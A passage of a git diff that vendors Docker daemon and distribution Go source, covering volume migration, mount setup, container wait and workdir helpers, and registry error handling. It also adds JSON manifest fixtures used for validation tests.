typical bind. +func setBindModeIfNull(bind *volume.MountPoint) { + if bind.Mode == "" { + bind.Mode = "z" + } +} + +// migrateVolume links the contents of a volume created pre Docker 1.7 +// into the location expected by the local driver. +// It creates a symlink from DOCKER_ROOT/vfs/dir/VOLUME_ID to DOCKER_ROOT/volumes/VOLUME_ID/_container_data. +// It preserves the volume json configuration generated pre Docker 1.7 to be able to +// downgrade from Docker 1.7 to Docker 1.6 without losing volume compatibility. +func migrateVolume(id, vfs string) error { + l, err := volumedrivers.GetDriver(volume.DefaultDriverName) + if err != nil { + return err + } + + newDataPath := l.(*local.Root).DataPath(id) + fi, err := os.Stat(newDataPath) + if err != nil && !os.IsNotExist(err) { + return err + } + + if fi != nil && fi.IsDir() { + return nil + } + + return os.Symlink(vfs, newDataPath) +} + +// verifyVolumesInfo ports volumes configured for the containers pre docker 1.7. +// It reads the container configuration and creates valid mount points for the old volumes. +func (daemon *Daemon) verifyVolumesInfo(container *container.Container) error { + // Inspect old structures only when we're upgrading from old versions + // to versions >= 1.7 and the MountPoints has not been populated with volumes data. + type volumes struct { + Volumes map[string]string + VolumesRW map[string]bool + } + cfgPath, err := container.ConfigPath() + if err != nil { + return err + } + f, err := os.Open(cfgPath) + if err != nil { + return errors.Wrap(err, "could not open container config") + } + defer f.Close() + var cv volumes + if err := json.NewDecoder(f).Decode(&cv); err != nil { + return errors.Wrap(err, "could not decode container config") + } + + if len(container.MountPoints) == 0 && len(cv.Volumes) > 0 { + for destination, hostPath := range cv.Volumes { + vfsPath := filepath.Join(daemon.root, "vfs", "dir") + rw := cv.VolumesRW != nil && cv.VolumesRW[destination] + + if strings.HasPrefix(hostPath, vfsPath) { + id := filepath.Base(hostPath) + v, err := daemon.volumes.CreateWithRef(id, volume.DefaultDriverName, container.ID, nil, nil) + if err != nil { + return err + } + if err := migrateVolume(id, hostPath); err != nil { + return err + } + container.AddMountPointWithVolume(destination, v, true) + } else { // Bind mount + m := volume.MountPoint{Source: hostPath, Destination: destination, RW: rw} + container.MountPoints[destination] = &m + } + } + return container.ToDisk() + } + return nil +} + +func (daemon *Daemon) mountVolumes(container *container.Container) error { + mounts, err := daemon.setupMounts(container) + if err != nil { + return err + } + + for _, m := range mounts { + dest, err := container.GetResourcePath(m.Destination) + if err != nil { + return err + } + + var stat os.FileInfo + stat, err = os.Stat(m.Source) + if err != nil { + return err + } + if err = fileutils.CreateIfNotExists(dest, stat.IsDir()); err != nil { + return err + } + + opts := "rbind,ro" + if m.Writable { + opts = "rbind,rw" + } + + if err := mount.Mount(m.Source, dest, bindMountType, opts); err != nil { + return err + } + + // mountVolumes() seems to be called for temporary mounts + // outside the container. Soon these will be unmounted with + // lazy unmount option and given we have mounted the rbind, + // all the submounts will propagate if these are shared. If + // daemon is running in host namespace and has / as shared + // then these unmounts will propagate and unmount original + // mount as well. So make all these mounts rprivate. + // Do not use propagation property of volume as that should + // apply only when mounting happen inside the container. + if err := mount.MakeRPrivate(dest); err != nil { + return err + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/volumes_windows.go b/vendor/github.com/docker/docker/daemon/volumes_windows.go new file mode 100644 index 0000000000..bf7fc478a1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes_windows.go @@ -0,0 +1,47 @@ +// +build windows + +package daemon + +import ( + "sort" + + "github.com/docker/docker/container" + "github.com/docker/docker/volume" +) + +// setupMounts configures the mount points for a container by appending each +// of the configured mounts on the container to the OCI mount structure +// which will ultimately be passed into the oci runtime during container creation. +// It also ensures each of the mounts are lexographically sorted. + +// BUGBUG TODO Windows containerd. This would be much better if it returned +// an array of runtime spec mounts, not container mounts. Then no need to +// do multiple transitions. + +func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, error) { + var mnts []container.Mount + for _, mount := range c.MountPoints { // type is volume.MountPoint + if err := daemon.lazyInitializeVolume(c.ID, mount); err != nil { + return nil, err + } + s, err := mount.Setup(c.MountLabel, 0, 0) + if err != nil { + return nil, err + } + + mnts = append(mnts, container.Mount{ + Source: s, + Destination: mount.Destination, + Writable: mount.RW, + }) + } + + sort.Sort(mounts(mnts)) + return mnts, nil +} + +// setBindModeIfNull is platform specific processing which is a no-op on +// Windows. +func setBindModeIfNull(bind *volume.MountPoint) { + return +} diff --git a/vendor/github.com/docker/docker/daemon/wait.go b/vendor/github.com/docker/docker/daemon/wait.go new file mode 100644 index 0000000000..2dab22e991 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/wait.go @@ -0,0 +1,32 @@ +package daemon + +import ( + "time" + + "golang.org/x/net/context" +) + +// ContainerWait stops processing until the given container is +// stopped. If the container is not found, an error is returned. On a +// successful stop, the exit code of the container is returned. On a +// timeout, an error is returned. If you want to wait forever, supply +// a negative duration for the timeout. +func (daemon *Daemon) ContainerWait(name string, timeout time.Duration) (int, error) { + container, err := daemon.GetContainer(name) + if err != nil { + return -1, err + } + + return container.WaitStop(timeout) +} + +// ContainerWaitWithContext returns a channel where exit code is sent +// when container stops. Channel can be cancelled with a context. +func (daemon *Daemon) ContainerWaitWithContext(ctx context.Context, name string) error { + container, err := daemon.GetContainer(name) + if err != nil { + return err + } + + return container.WaitWithContext(ctx) +} diff --git a/vendor/github.com/docker/docker/daemon/workdir.go b/vendor/github.com/docker/docker/daemon/workdir.go new file mode 100644 index 0000000000..5bd0d0caca --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/workdir.go @@ -0,0 +1,21 @@ +package daemon + +// ContainerCreateWorkdir creates the working directory. This is solves the +// issue arising from https://github.com/docker/docker/issues/27545, +// which was initially fixed by https://github.com/docker/docker/pull/27884. But that fix +// was too expensive in terms of performance on Windows. Instead, +// https://github.com/docker/docker/pull/28514 introduces this new functionality +// where the builder calls into the backend here to create the working directory. +func (daemon *Daemon) ContainerCreateWorkdir(cID string) error { + container, err := daemon.GetContainer(cID) + if err != nil { + return err + } + err = daemon.Mount(container) + if err != nil { + return err + } + defer daemon.Unmount(container) + rootUID, rootGID := daemon.GetRemappedUIDGID() + return container.SetupWorkingDirectory(rootUID, rootGID) +} diff --git a/vendor/github.com/docker/docker/distribution/config.go b/vendor/github.com/docker/docker/distribution/config.go new file mode 100644 index 0000000000..bfea8b0336 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/config.go @@ -0,0 +1,241 @@ +package distribution + +import ( + "encoding/json" + "fmt" + "io" + "runtime" + + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest/schema2" + "github.com/docker/docker/api/types" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/docker/libtrust" + "golang.org/x/net/context" +) + +// Config stores configuration for communicating +// with a registry. +type Config struct { + // MetaHeaders stores HTTP headers with metadata about the image + MetaHeaders map[string][]string + // AuthConfig holds authentication credentials for authenticating with + // the registry. + AuthConfig *types.AuthConfig + // ProgressOutput is the interface for showing the status of the pull + // operation. + ProgressOutput progress.Output + // RegistryService is the registry service to use for TLS configuration + // and endpoint lookup. + RegistryService registry.Service + // ImageEventLogger notifies events for a given image + ImageEventLogger func(id, name, action string) + // MetadataStore is the storage backend for distribution-specific + // metadata. + MetadataStore metadata.Store + // ImageStore manages images. + ImageStore ImageConfigStore + // ReferenceStore manages tags. This value is optional, when excluded + // content will not be tagged. + ReferenceStore reference.Store + // RequireSchema2 ensures that only schema2 manifests are used. + RequireSchema2 bool +} + +// ImagePullConfig stores pull configuration. +type ImagePullConfig struct { + Config + + // DownloadManager manages concurrent pulls. + DownloadManager RootFSDownloadManager + // Schema2Types is the valid schema2 configuration types allowed + // by the pull operation. + Schema2Types []string +} + +// ImagePushConfig stores push configuration. +type ImagePushConfig struct { + Config + + // ConfigMediaType is the configuration media type for + // schema2 manifests. + ConfigMediaType string + // LayerStore manages layers. + LayerStore PushLayerProvider + // TrustKey is the private key for legacy signatures. This is typically + // an ephemeral key, since these signatures are no longer verified. + TrustKey libtrust.PrivateKey + // UploadManager dispatches uploads. + UploadManager *xfer.LayerUploadManager +} + +// ImageConfigStore handles storing and getting image configurations +// by digest. Allows getting an image configurations rootfs from the +// configuration. +type ImageConfigStore interface { + Put([]byte) (digest.Digest, error) + Get(digest.Digest) ([]byte, error) + RootFSFromConfig([]byte) (*image.RootFS, error) +} + +// PushLayerProvider provides layers to be pushed by ChainID. +type PushLayerProvider interface { + Get(layer.ChainID) (PushLayer, error) +} + +// PushLayer is a pushable layer with metadata about the layer +// and access to the content of the layer. +type PushLayer interface { + ChainID() layer.ChainID + DiffID() layer.DiffID + Parent() PushLayer + Open() (io.ReadCloser, error) + Size() (int64, error) + MediaType() string + Release() +} + +// RootFSDownloadManager handles downloading of the rootfs +type RootFSDownloadManager interface { + // Download downloads the layers into the given initial rootfs and + // returns the final rootfs. + // Given progress output to track download progress + // Returns function to release download resources + Download(ctx context.Context, initialRootFS image.RootFS, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) +} + +type imageConfigStore struct { + image.Store +} + +// NewImageConfigStoreFromStore returns an ImageConfigStore backed +// by an image.Store for container images. +func NewImageConfigStoreFromStore(is image.Store) ImageConfigStore { + return &imageConfigStore{ + Store: is, + } +} + +func (s *imageConfigStore) Put(c []byte) (digest.Digest, error) { + id, err := s.Store.Create(c) + return digest.Digest(id), err +} + +func (s *imageConfigStore) Get(d digest.Digest) ([]byte, error) { + img, err := s.Store.Get(image.IDFromDigest(d)) + if err != nil { + return nil, err + } + return img.RawJSON(), nil +} + +func (s *imageConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) { + var unmarshalledConfig image.Image + if err := json.Unmarshal(c, &unmarshalledConfig); err != nil { + return nil, err + } + + // fail immediately on windows + if runtime.GOOS == "windows" && unmarshalledConfig.OS == "linux" { + return nil, fmt.Errorf("image operating system %q cannot be used on this platform", unmarshalledConfig.OS) + } + + return unmarshalledConfig.RootFS, nil +} + +type storeLayerProvider struct { + ls layer.Store +} + +// NewLayerProviderFromStore returns a layer provider backed by +// an instance of LayerStore. Only getting layers as gzipped +// tars is supported. +func NewLayerProviderFromStore(ls layer.Store) PushLayerProvider { + return &storeLayerProvider{ + ls: ls, + } +} + +func (p *storeLayerProvider) Get(lid layer.ChainID) (PushLayer, error) { + if lid == "" { + return &storeLayer{ + Layer: layer.EmptyLayer, + }, nil + } + l, err := p.ls.Get(lid) + if err != nil { + return nil, err + } + + sl := storeLayer{ + Layer: l, + ls: p.ls, + } + if d, ok := l.(distribution.Describable); ok { + return &describableStoreLayer{ + storeLayer: sl, + describable: d, + }, nil + } + + return &sl, nil +} + +type storeLayer struct { + layer.Layer + ls layer.Store +} + +func (l *storeLayer) Parent() PushLayer { + p := l.Layer.Parent() + if p == nil { + return nil + } + sl := storeLayer{ + Layer: p, + ls: l.ls, + } + if d, ok := p.(distribution.Describable); ok { + return &describableStoreLayer{ + storeLayer: sl, + describable: d, + } + } + + return &sl +} + +func (l *storeLayer) Open() (io.ReadCloser, error) { + return l.Layer.TarStream() +} + +func (l *storeLayer) Size() (int64, error) { + return l.Layer.DiffSize() +} + +func (l *storeLayer) MediaType() string { + // layer store always returns uncompressed tars + return schema2.MediaTypeUncompressedLayer +} + +func (l *storeLayer) Release() { + if l.ls != nil { + layer.ReleaseAndLog(l.ls, l.Layer) + } +} + +type describableStoreLayer struct { + storeLayer + describable distribution.Describable +} + +func (l *describableStoreLayer) Descriptor() distribution.Descriptor { + return l.describable.Descriptor() +} diff --git a/vendor/github.com/docker/docker/distribution/errors.go b/vendor/github.com/docker/docker/distribution/errors.go new file mode 100644 index 0000000000..b8cf9fb9e8 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/errors.go @@ -0,0 +1,159 @@ +package distribution + +import ( + "net/url" + "strings" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/registry/api/errcode" + "github.com/docker/distribution/registry/api/v2" + "github.com/docker/distribution/registry/client" + "github.com/docker/distribution/registry/client/auth" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/reference" + "github.com/pkg/errors" +) + +// ErrNoSupport is an error type used for errors indicating that an operation +// is not supported. It encapsulates a more specific error. +type ErrNoSupport struct{ Err error } + +func (e ErrNoSupport) Error() string { + if e.Err == nil { + return "not supported" + } + return e.Err.Error() +} + +// fallbackError wraps an error that can possibly allow fallback to a different +// endpoint. +type fallbackError struct { + // err is the error being wrapped. + err error + // confirmedV2 is set to true if it was confirmed that the registry + // supports the v2 protocol. This is used to limit fallbacks to the v1 + // protocol. + confirmedV2 bool + // transportOK is set to true if we managed to speak HTTP with the + // registry. This confirms that we're using appropriate TLS settings + // (or lack of TLS). + transportOK bool +} + +// Error renders the FallbackError as a string. +func (f fallbackError) Error() string { + return f.Cause().Error() +} + +func (f fallbackError) Cause() error { + return f.err +} + +// shouldV2Fallback returns true if this error is a reason to fall back to v1. +func shouldV2Fallback(err errcode.Error) bool { + switch err.Code { + case errcode.ErrorCodeUnauthorized, v2.ErrorCodeManifestUnknown, v2.ErrorCodeNameUnknown: + return true + } + return false +} + +// TranslatePullError is used to convert an error from a registry pull +// operation to an error representing the entire pull operation. Any error +// information which is not used by the returned error gets output to +// log at info level. +func TranslatePullError(err error, ref reference.Named) error { + switch v := err.(type) { + case errcode.Errors: + if len(v) != 0 { + for _, extra := range v[1:] { + logrus.Infof("Ignoring extra error returned from registry: %v", extra) + } + return TranslatePullError(v[0], ref) + } + case errcode.Error: + var newErr error + switch v.Code { + case errcode.ErrorCodeDenied: + // ErrorCodeDenied is used when access to the repository was denied + newErr = errors.Errorf("repository %s not found: does not exist or no pull access", ref.Name()) + case v2.ErrorCodeManifestUnknown: + newErr = errors.Errorf("manifest for %s not found", ref.String()) + case v2.ErrorCodeNameUnknown: + newErr = errors.Errorf("repository %s not found", ref.Name()) + } + if newErr != nil { + logrus.Infof("Translating %q to %q", err, newErr) + return newErr + } + case xfer.DoNotRetry: + return TranslatePullError(v.Err, ref) + } + + return err +} + +// continueOnError returns true if we should fallback to the next endpoint +// as a result of this error. +func continueOnError(err error) bool { + switch v := err.(type) { + case errcode.Errors: + if len(v) == 0 { + return true + } + return continueOnError(v[0]) + case ErrNoSupport: + return continueOnError(v.Err) + case errcode.Error: + return shouldV2Fallback(v) + case *client.UnexpectedHTTPResponseError: + return true + case ImageConfigPullError: + return false + case error: + return !strings.Contains(err.Error(), strings.ToLower(syscall.ENOSPC.Error())) + } + // let's be nice and fallback if the error is a completely + // unexpected one. + // If new errors have to be handled in some way, please + // add them to the switch above. + return true +} + +// retryOnError wraps the error in xfer.DoNotRetry if we should not retry the +// operation after this error. +func retryOnError(err error) error { + switch v := err.(type) { + case errcode.Errors: + if len(v) != 0 { + return retryOnError(v[0]) + } + case errcode.Error: + switch v.Code { + case errcode.ErrorCodeUnauthorized, errcode.ErrorCodeUnsupported, errcode.ErrorCodeDenied, errcode.ErrorCodeTooManyRequests, v2.ErrorCodeNameUnknown: + return xfer.DoNotRetry{Err: err} + } + case *url.Error: + switch v.Err { + case auth.ErrNoBasicAuthCredentials, auth.ErrNoToken: + return xfer.DoNotRetry{Err: v.Err} + } + return retryOnError(v.Err) + case *client.UnexpectedHTTPResponseError: + return xfer.DoNotRetry{Err: err} + case error: + if err == distribution.ErrBlobUnknown { + return xfer.DoNotRetry{Err: err} + } + if strings.Contains(err.Error(), strings.ToLower(syscall.ENOSPC.Error())) { + return xfer.DoNotRetry{Err: err} + } + } + // let's be nice and fallback if the error is a completely + // unexpected one. + // If new errors have to be handled in some way, please + // add them to the switch above. + return err +} diff --git a/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/bad_manifest b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/bad_manifest new file mode 100644 index 0000000000..a1f02a62a3 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/bad_manifest @@ -0,0 +1,38 @@ +{ + "schemaVersion": 2, + "name": "library/hello-world", + "tag": "latest", + "architecture": "amd64", + "fsLayers": [ + { + "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" + }, + { + "blobSum": "sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb" + } + ], + "history": [ + { + "v1Compatibility": "{\"id\":\"af340544ed62de0680f441c71fa1a80cb084678fed42bae393e543faea3a572c\",\"parent\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.608577814Z\",\"container\":\"c2b715156f640c7ac7d98472ea24335aba5432a1323a3bb722697e6d37ef794f\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) CMD [\\\"/hello\\\"]\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/hello\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n" + }, + { + "v1Compatibility": "{\"id\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.241352727Z\",\"container\":\"9aeb0006ffa72a8287564caaea87625896853701459261d3b569e320c0c9d5dc\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:4abd3bff60458ca3b079d7b131ce26b2719055a030dfa96ff827da2b7c7038a7 in /\"],\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":null,\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":960}\n" + } + ], + "signatures": [ + { + "header": { + "jwk": { + "crv": "P-256", + "kid": "OIH7:HQFS:44FK:45VB:3B53:OIAG:TPL4:ATF5:6PNE:MGHN:NHQX:2GE4", + "kty": "EC", + "x": "Cu_UyxwLgHzE9rvlYSmvVdqYCXY42E9eNhBb0xNv0SQ", + "y": "zUsjWJkeKQ5tv7S-hl1Tg71cd-CqnrtiiLxSi6N_yc8" + }, + "alg": "ES256" + }, + "signature": "Y6xaFz9Sy-OtcnKQS1Ilq3Dh8cu4h3nBTJCpOTF1XF7vKtcxxA_xMP8-SgDo869SJ3VsvgPL9-Xn-OoYG2rb1A", + "protected": "eyJmb3JtYXRMZW5ndGgiOjMxOTcsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAxNS0wOS0xMVQwNDoxMzo0OFoifQ" + } + ] +} diff --git a/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/extra_data_manifest b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/extra_data_manifest new file mode 100644 index 0000000000..beec19a801 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/extra_data_manifest @@ -0,0 +1,46 @@ +{ + "schemaVersion": 1, + "name": "library/hello-world", + "tag": "latest", + "architecture": "amd64", + "fsLayers": [ + { + "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" + }, + { + "blobSum": "sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb" + } + ], + "history": [ + { + "v1Compatibility": "{\"id\":\"af340544ed62de0680f441c71fa1a80cb084678fed42bae393e543faea3a572c\",\"parent\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.608577814Z\",\"container\":\"c2b715156f640c7ac7d98472ea24335aba5432a1323a3bb722697e6d37ef794f\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) CMD [\\\"/hello\\\"]\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/hello\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n" + }, + { + "v1Compatibility": "{\"id\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.241352727Z\",\"container\":\"9aeb0006ffa72a8287564caaea87625896853701459261d3b569e320c0c9d5dc\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:4abd3bff60458ca3b079d7b131ce26b2719055a030dfa96ff827da2b7c7038a7 in /\"],\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":null,\"Image\":\"\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":null},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":960}\n" + } + ], + "fsLayers": [ + { + "blobSum": "sha256:ffff95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" + }, + { + "blobSum": "sha256:ffff658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb" + } + ], + "signatures": [ + { + "header": { + "jwk": { + "crv": "P-256", + "kid": "OIH7:HQFS:44FK:45VB:3B53:OIAG:TPL4:ATF5:6PNE:MGHN:NHQX:2GE4", + "kty": "EC", + "x": "Cu_UyxwLgHzE9rvlYSmvVdqYCXY42E9eNhBb0xNv0SQ", + "y": "zUsjWJkeKQ5tv7S-hl1Tg71cd-CqnrtiiLxSi6N_yc8" + }, + "alg": "ES256" + }, + "signature": "Y6xaFz9Sy-OtcnKQS1Ilq3Dh8cu4h3nBTJCpOTF1XF7vKtcxxA_xMP8-SgDo869SJ3VsvgPL9-Xn-OoYG2rb1A", + "protected": "eyJmb3JtYXRMZW5ndGgiOjMxOTcsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAxNS0wOS0xMVQwNDoxMzo0OFoifQ" + } + ] +} diff --git a/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/good_manifest b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/good_manifest new file mode 100644 index 0000000000..b107de3226 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/fixtures/validate_manifest/good_manifest @@ -0,0 +1,38 @@ +{ + "schemaVersion": 1, + "name": "library/hello-world", + "tag": "latest", + "architecture": "amd64", + "fsLayers": [ + { + "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4" + }, + { + "blobSum": "sha256:03f4658f8b782e12230c1783426bd3bacce651ce582a4ffb6fbbfa2079428ecb" + } + ], + "history": [ + { + "v1Compatibility": "{\"id\":\"af340544ed62de0680f441c71fa1a80cb084678fed42bae393e543faea3a572c\",\"parent\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.608577814Z\",\"container\":\"c2b715156f640c7ac7d98472ea24335aba5432a1323a3bb722697e6d37ef794f\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) CMD [\\\"/hello\\\"]\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"docker_version\":\"1.7.1\",\"config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/hello\"],\"Image\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"Volumes\":null,\"VolumeDriver\":\"\",\"WorkingDir\":\"\",\"Entrypoint\":null,\"NetworkDisabled\":false,\"MacAddress\":\"\",\"OnBuild\":null,\"Labels\":{}},\"architecture\":\"amd64\",\"os\":\"linux\",\"Size\":0}\n" + }, + { + "v1Compatibility": "{\"id\":\"535020c3e8add9d6bb06e5ac15a261e73d9b213d62fb2c14d752b8e189b2b912\",\"created\":\"2015-08-06T23:53:22.241352727Z\",\"container\":\"9aeb0006ffa72a8287564caaea87625896853701459261d3b569e320c0c9d5dc\",\"container_config\":{\"Hostname\":\"9aeb0006ffa7\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":false,\"AttachStdout\":false,\"AttachStderr\":false,\"PortSpecs\":null,\"ExposedPorts\":null,\"Tty\":false,\"OpenStdin\":false,\"StdinOnce\":false,\"Env\":null,\"Cmd\":[\"/bin/sh\",\"-c\",\"#(nop) COPY file:4abd3bff60458ca3b079d7b131ce26b2719055a030dfa96ff827da2b7c7038a7 in 